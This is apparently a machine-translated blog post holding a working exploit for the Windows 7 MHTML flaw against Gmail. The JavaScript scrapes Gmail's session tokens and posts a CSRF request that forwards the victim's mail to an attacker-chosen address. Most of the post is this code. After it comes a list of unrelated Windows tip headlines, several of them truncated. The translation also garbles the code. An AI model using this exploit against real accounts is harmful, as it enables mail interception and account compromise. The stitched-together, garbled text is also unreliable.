Long time no update blog, turned to a Win7 GMAIL MHtml vulnerability test code, the last completed version does not know where to go - -!
MHtml vulnerability under Win7
to initiate AJax request, unlike XP directly request HTTP protocol, the requested URL must also be in the MHtml protocol, otherwise there is no permission, the homologous strategy under Win7 looks like XP strict? I don't know if anyone noticed this detail.
To attack GMAIL for related authority CSRF, you must take AT and IK two parameters to be successful. Of course, there are many ways to take these two parameters, which can be taken from COOKIE or directly from the page. The following code is taken directly from the page.
xmlHttp=new ActiveXObject("Microsoft.XMLHttp");
XMLHttp.open("GET","mHtml:https://mail.google.com/mail/h/0/", True);
XMLHttp.send();
XMLHttp.onreadystatechange = function() {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200 ) {
REX = /href=\\".*?at=(.{34})\\">/.exec(XMLHttp.responseText);
AThash = RegExp.$1;
XMLHttp. Open("GET","mHtml:https://mail.google.com/mail/",true);
XMLHttp.send();
XMLHttp.onreadystatechange = function() {
if (XMLHttp.readyState == 4) {
if (XMLHttp.status == 200) {
REX = /GLOBALS=\\[.*?,"(.{10})",/.exec(XMLHttp .responseText);
IKhash = RegExp.$1;
XMLHttp.open("POST","mHtml:https://mail.google.com/mail/?ui=2"+"&ik= "+IKhash+"&vIEw=mdlg&at="+AThash,true);
XMLHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttp. Send("mdrp=1&mda=%0D%0A"+Tmail+"%0D%0A");
}
}
}
}
}
}
}
Today, Microsoft has increased its investment in the Chinese market, and even reduced the price of C
In Windows 7, Microsoft added a new feature to the desktop window setting: Smart Arrangement. In fac
Recently, when adding text using the drawing software that comes with Win7 system
Recently, users in the win7 Ultimate are just inexplicably popping up com surrogate has stopped work
Solve the jagged problem of playing video and audio under Windows 7
Using Win7 multi-condition search to retrieve the desired file
Features of Windows 7: Remote Media Stream
Windows Tips: How to make the computer "automatically on time"
Using the Windows 7 "Problem Step Recorder" function
Super Tips in Win 7: Problem Step Recorder
How to make Windows7 Explorer browse style unification
Win7 extended C disk partition problem
Want to know the date of birth of your Win7?
Teach you to correctly set the virtual memory of Windows 7
Large hard disk is also used to modify the Win7 file storage location
Windows 7 IIS installation and configuration tutorial (graphic)
Samsung Camera Interface driver(FIMC)
How can the WinXP system shut down your computer with a risk warning?
How to add remote search function to Windows 7 Explorer
Windows XP operating system firewall classic use guide
Win8.1 installs .NET Framework 3.5 graphic tutorial
Unable to start Distributed Transaction Coordinator service (server error prompt)
Win8.1 activation tool tutorial
Win10 switch MS account termination solution
Can the notebook CPU be changed to the desktop?
Empty the recycle bin prompt: "Do you really want to delete windows?" Resolve